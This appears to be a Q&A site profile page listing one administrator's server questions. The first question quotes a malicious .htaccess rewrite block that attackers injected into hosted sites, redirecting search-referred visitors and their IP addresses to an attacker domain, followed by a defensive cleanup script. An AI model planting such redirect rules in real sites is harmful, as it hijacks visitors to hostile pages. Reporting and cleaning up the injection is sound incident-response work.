SnapOverflow


Brent's questions

Brent
Asked: 2010-12-22 06:52:17 +0800 CST

Finding Webserver Vulnerability

  • 6

We operate a webserver farm hosting around 300 websites.

Yesterday morning a script placed .htaccess files owned by www-data (the apache user) in every directory under the document_root of most (but not all) sites.

The content of the .htaccess file was this:

# Injected block: redirects any visitor who arrived from an external referer
# (e.g. a search engine) to the attacker's domain, appending the visitor's IP.
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^http://
RewriteCond %{HTTP_REFERER} !%{HTTP_HOST}
RewriteRule . http://84f6a4eef61784b33e4acbd32c8fdd72.com/%{REMOTE_ADDR}

Googling for that url (which is the md5 hash of "antivirus") I discovered that this same thing happened all over the internet, and am looking for somebody who has already dealt with this, and determined where the vulnerability is.

I have searched most of our logs, but haven't found anything conclusive yet. Are there others who experienced the same thing that have gotten further than I have in pinpointing the hole?

So far we have determined:

  • the changes were made as www-data, so apache or its plugins are likely the culprit
  • all the changes were made within 15 minutes of each other, so it was probably automated
  • since our websites have widely varying domain names, I think a single vulnerability on one site was responsible (rather than a common vulnerability on every site)
  • if an .htaccess file already existed and was writeable by www-data, then the script was kind, and simply appended the above lines to the end of the file (making it easy to reverse)

Any more hints would be appreciated.

==Edit==

For those who need it, here is the script I used to clean up the .htaccess files:

#!/bin/bash
# Removes the injected rewrite block from every .htaccess under $DIR.
# Files that consist only of the 4 injected lines are deleted; files where the
# block was appended have their last 4 lines stripped; anything else is
# reported for manual review.
PATT=84f6a4eef61784b33e4acbd32c8fdd72.com
DIR=/mnt
# mktemp must be given the full path, otherwise the temp file is created in
# the current directory and $TMP points at a file that does not exist.
TMP=$(mktemp /tmp/htaccess.XXXXXX)
trap 'rm -f "$TMP"' EXIT

find "$DIR" -type f -name .htaccess | while read -r FILE; do
  if grep -qF "$PATT" "$FILE"; then
    if [ "$(wc -l < "$FILE")" -eq 4 ]; then
      # File contains nothing but the injected block
      rm "$FILE"
    else
      if tail -n1 "$FILE" | grep -qF "$PATT"; then
        # Block was appended: keep everything except the last 4 lines
        cp "$FILE" "$TMP"
        LINES=$(wc -l < "$TMP")
        GOODLINES=$((LINES - 4))
        head -n "$GOODLINES" "$TMP" > "$FILE"
      else
        echo "$FILE requires manual intervention"
      fi
    fi
  fi
done

apache-2.2 security hacking .htaccess vulnerability
  • 2 Answers
  • 828 Views
Brent
Asked: 2010-02-10 11:51:18 +0800 CST

Debian: SSH: "PermitRootLogin=forced-commands-only" stopped working

  • 5

I have several servers running Debian Lenny.

Just recently I discovered the PermitRootLogin=forced-commands-only directive for ssh, which allows me to run a scripted rsync as root with an ssl key, without enabling more generalized root ssh access.

However, last week this stopped working - it appears on all of my servers - and I can't figure out why.

Everything continues to work fine with PermitRootLogin=yes, but I would prefer to block root logins - especially via passwords.

The day it stopped working, we reconfigured some of the ports on one of our switches (which we later reverted), but I can't see that affecting this, since it still works with PermitRootLogin set to yes.

How can I diagnose why the forced-commands-only directive has apparently stopped working?

linux debian ssh
  • 2 Answers
  • 10697 Views
Brent
Asked: 2009-12-08 08:29:34 +0800 CST

Pros/Cons of switching from Exchange to GMail

  • 7

We are a medium-large non-profit company, with around 1000 staff and volunteers, and have been using MS Exchange (currently 2003) for our mail system for years.

I recently attended a Google conference where they were positing that "Cloud computing is the way of the future", and encouraging us to switch from doing our own email with Exchange, to using GMail and Google Apps for everything.

Additionally, one of our departments has been pushing from inside to do this transition within their own department, if not throughout the entire organization.

I can definitely see some benefits - such as:

  1. Archive space - we never seem to have the space our users want, and of course, the more we get, the more we have to back up
  2. OS Agnostic - Exchange is definitely built for windows, and with mac and linux users on the rise, these users increasingly demand better tools / support. Google offers this.
  3. Better archiving - potential of e-discovery, that doesn't exist in a practical way with our current setup.
  4. Switching would relieve us of a fair bit of server administration, give more options to our end users, and free up the server resources we are now using for Exchange.
  5. Our IT department wants to be perceived as providing up-to-date solutions to technical problems, and this change would definitely provide such an image.
  6. Google's infrastructure is obviously much more robust than ours, and they employ some of the world's best security and network experts.

However, there are also some serious drawbacks:

  1. We would be essentially outsourcing one of our mission-critical systems to a 3rd party
  2. The switch would inevitably involve Google Apps and perhaps more as well. That means we would have a lot more at the mercy of a single (potentially weak) password. (is there a way to make this more secure using a password plus physical key of some sort?)
  3. Our data would not remain under our roof - or even in our country (Canada). This obviously has plusses on the Disaster Recovery side, but I think there are potential negatives on the legal side.
  4. I can't imagine that somebody as large as Google would be as responsive as we would want with regard to non-critical issues such as tracing missing emails, etc. (not sure how much access we would have to basic mail logs - for instance)

Can anyone help me evaluate this decision?

  • What issues am I overlooking?
  • What experiences have you had with this transition (or the opposite - gmail to Exchange)
  • Can you add to the points I have already outlined?

email
  • 9 Answers
  • 5023 Views
Brent
Asked: 2009-11-27 09:23:39 +0800 CST

Tracking Apache by VirtualHost

  • 8

I have an apache webserver running many VirtualHosts.

Recently it has been bogging down and becoming unresponsive, and I'm wondering how I can determine which VirtualHosts are causing most of the issue. We have had occasions in the past where a bug in the code of an individual site has taken down the whole server. My goal is to be able to diagnose these instances quickly.

I am monitoring the server with munin and notice that the number of apache processes, memory usage, and load tend to be very high during the periods in question. Problem is, these statistics are for the whole webserver, not for individual VirtualHosts.

I have written a script to parse the weblogs for traffic per VirtualHost, but it is appearing that that is not enough. I probably need to determine how many apache processes each VirtualHost is responsible for, or how long they hold each process open - or perhaps how much memory usage each is responsible for.

Where can I find this information? I don't mind writing a script to track this data, but I don't know exactly where to extract it from in the first place.

apache-2.2
  • 2 Answers
  • 5910 Views
Brent
Asked: 2009-07-25 07:58:30 +0800 CST

How can I delete all files from a directory when it reports "Argument list too long"

  • 11

I have a directory with a couple hundred thousand files in it.

I want to delete all the files, but rm * -f reports: "argument list too long"

What is the best way to clear out this directory?

linux debian
  • 8 Answers
  • 4478 Views
Brent
Asked: 2009-07-01 12:09:47 +0800 CST

How do I set up per-site php.ini files on a LAMP server using NameVirtualHosts?

  • 10

I have a LAMP server serving a number of different websites using NameVirtualHosts.

Until recently having a global php.ini file has been just fine, but recently one of our developers has requested some settings in php.ini that I'd rather not set globally.

I'm pretty sure I've heard that you can set up php.ini files on a per-site basis, but don't know how to go about doing this.

Can somebody point me in the right direction as to how to accomplish this?

php apache-2.2 lamp configuration
  • 4 Answers
  • 22663 Views
Brent
Asked: 2009-06-24 05:38:49 +0800 CST

Is there a way to remove "Last message repeated x times" from logs?

  • 13

I have a script that updates me on any changes to the kernel log on my (Debian) servers.

The problem is that occasionally the log contains lines like:

last message repeated 4 times

I realize that this is a feature to shorten the size of the logs - but would prefer in this case that every instance of the message be logged instead.

Is there a way to turn off this feature?

linux debian log-files syslog
  • 4 Answers
  • 30749 Views
Brent
Asked: 2009-06-23 11:35:23 +0800 CST

Postfix Configuration problem (domain of sender address does not exist)

  • 10

I am setting up a linux server that I want to send mail independently of our main mailserver (ie. directly). The problem is, when I send mail to an external address, it bounces with the message domain of sender address does not exist. (it is sending the mail as [email protected])

What is the proper way to change the domain of my email sender?

postfix configuration
  • 7 Answers
  • 73614 Views
Brent
Asked: 2009-06-20 14:51:09 +0800 CST

Is it possible to use etckeeper with a single shared git repository?

  • 10

I noticed that several people have recommended using etckeeper to apply version control to my /etc directory.

It appears to me that the default install puts a repository on the same machine as the /etc you are trying to manage. This works fine for version control, but doesn't give the added benefit of making an off-server backup of the files - or allow me to duplicate portions of /etc from one source machine to another.

Is it possible to share a single git repository on a central admin machine, so that etckeeper on each server stores its data in the same place?

(I am doing a similar thing now with svn and some custom scripts to commit and revert files, but I have to remember to commit them when I make changes.)

version-control git etc etckeeper
  • 5 Answers
  • 4970 Views
Brent
Asked: 2009-06-16 11:29:35 +0800 CST

Scrollback not working in terminal window (ssh session)

  • 13

I have an ubuntu slice at slicehost, which means it is a DomU on a Xen host - and it's a pretty stripped down installation.

The thing that bugs me is that scrolling back in the terminal using shift-pgup doesn't work.

Can anybody tell me what package enables this scrollback functionality (so I can check if it is installed) - or if you have any other insights into why it might not be working, let me know.

(note: I am currently running screen with "defscrollback 1024" set, but it still doesn't work)

linux slicehost terminal
  • 4 Answers
  • 15352 Views
Brent
Asked: 2009-06-11 12:02:40 +0800 CST

How to use Active Directory to authenticate linux users

  • 11

What are the best-practices for using Active Directory to authenticate users on linux (Debian) boxes?

The way I would like it to work would be to add AD users to a group - say linux administrators or linux webserver, and based on their group membership they would/would not be granted access to a particular server. Ideally the root account would be the only one maintained in the standard way.

My goals in doing this are as follows:

  • To allow password changes in one place
  • To automatically grant certain people access to the linux servers using their AD credentials
  • To consolidate all of our user information into one database

Things I want to avoid are:

  • anything difficult/counter-intuitive for our Active Directory administrator to manage
  • locking users out if the AD servers are unreachable for some reason (ie - it needs to cache the credentials somehow)
  • anything too complex or non-standard that will break the next time I upgrade the server.

linux debian active-directory authentication
  • 5 Answers
  • 107261 Views
Brent
Asked: 2009-06-05 08:21:11 +0800 CST

How to use a Tone Generator to trace a network cable

  • 12

We have a tone generator kit for tracing network cables, but I am having trouble using it correctly.

The tone generator end plugs into the network cable I am trying to trace, and then I assume I should be able to go into the server room and just swipe the probe across the ends of the patch cables while still plugged into the switch, and hear the tone, but that doesn't seem to work.

  • When the probe is pointed directly at the tone generator, it responds correctly.
  • When I point it a few inches down the wire that is connected to it, it does not respond. I suspect this is due to the cable shielding? As a result, I assume I need to point at the cable end, and not the middle of the wire in the server room.
  • My understanding is that the probe does not require you to un-plug any cables to work. Is this correct?

It would be great if someone who knows what they are doing would document the correct procedure here.

Thanks.

networking cable
  • 11 Answers
  • 78281 Views
Brent
Asked: 2009-05-24 05:17:02 +0800 CST

Setting up a fake email address to trap spammers

  • 10

I have heard it suggested that we set up a special email address, with its only purpose being to be harvested, and then blacklist every sender that targets this address.

I'm wondering:

  • if anyone else has tried this
  • how do you go about doing it (ie - put the address in a hidden field on your website - or better ways?)
  • does it work?
  • Is there anything to watch out for when trying this (ie. legitimate senders using harvested addresses?)

email spam honeypot
  • 10 Answers
  • 5241 Views
Brent
Asked: 2009-05-23 14:30:46 +0800 CST

How is the SysRq key used on a linux system?

  • 6

I understand that the SysRq key can be used to execute low-level system commands on a crashed linux server.

Can someone explain how to use this feature, whether it works remotely over ssh or a vmware console window, and anything else it can be used for (besides rebooting a crashed system)?

linux keyboard
  • 3 Answers
  • 3480 Views
Brent
Asked: 2009-05-21 14:01:21 +0800 CST

Is it possible to match an internal IP address to a switch port?

  • 8

I'm trying to find a computer that has a certain IP address on our internal network. I have identified the computer name from DNS, but in this case it does not help me.

Just wondering if I can somehow tie the IP to a switch port, and track it from there? If so, how?

networking ip arp trace ethernet
  • 6 Answers
  • 30093 Views
Brent
Asked: 2009-05-13 09:54:48 +0800 CST

How to determine if a bash variable is empty?

  • 920

What is the best way to determine if a variable in bash is empty ("")?

I have heard that it is recommended that I do if [ "x$variable" = "x" ]

Is that the correct way? (there must be something more straightforward)

scripting bash variables
  • 15 Answers
  • 1279404 Views
Brent
Asked: 2009-05-07 05:59:54 +0800 CST

How would I grab a text file off of a windows machine from a linux cli?

  • 7

I am writing a bash script to analyze the mail logs on our network, which is mostly postfix boxes, but would like to include MS Exchange logs in the analysis if possible.

Is there any way to copy a file off of a windows machine remotely from the command line in linux? (note: I have admin priv's on the windows box)

windows linux bash copying
  • 9 Answers
  • 395 Views
Brent
Asked: 2009-05-06 18:50:18 +0800 CST

Bash script parameters

  • 7

I need to write a bash script, and would like it to parse unordered parameters of the format:

scriptname --param1 <string> --param2 <string> --param3 <date>

Is there a simple way to accomplish this, or am I pretty much stuck with $1, $2, $3?

edit

(note - I don't need long parameter names - single letters would be fine too)

scripting bash command-line-interface
  • 1 Answers
  • 471 Views
Brent
Asked: 2009-05-03 15:01:42 +0800 CST

Network Traffic Monitoring

  • 18
Locked. This question and its answers are locked because the question is off-topic but has historical significance. It is not currently accepting new answers or interactions.

What is the best tool to monitor/analyze network traffic on an entire network (several subnets)?

I'm looking for something that will help me troubleshoot bandwidth problems when, for instance, users start complaining that the "network is slow".

monitoring bandwidth traffic
  • 10 Answers
  • 4798 Views
Brent
Asked: 2009-05-03 12:05:50 +0800 CST

How can I force other users to log out?

  • 14

Is there a simple way for me to force another user off of a linux box, while I am logged in as root? I understand that I could determine what type of session they have open, and kill the pid - but I'm thinking there must be a command to do this that I don't know about.

Any ideas?

linux user-management
  • 4 Answers
  • 18069 Views
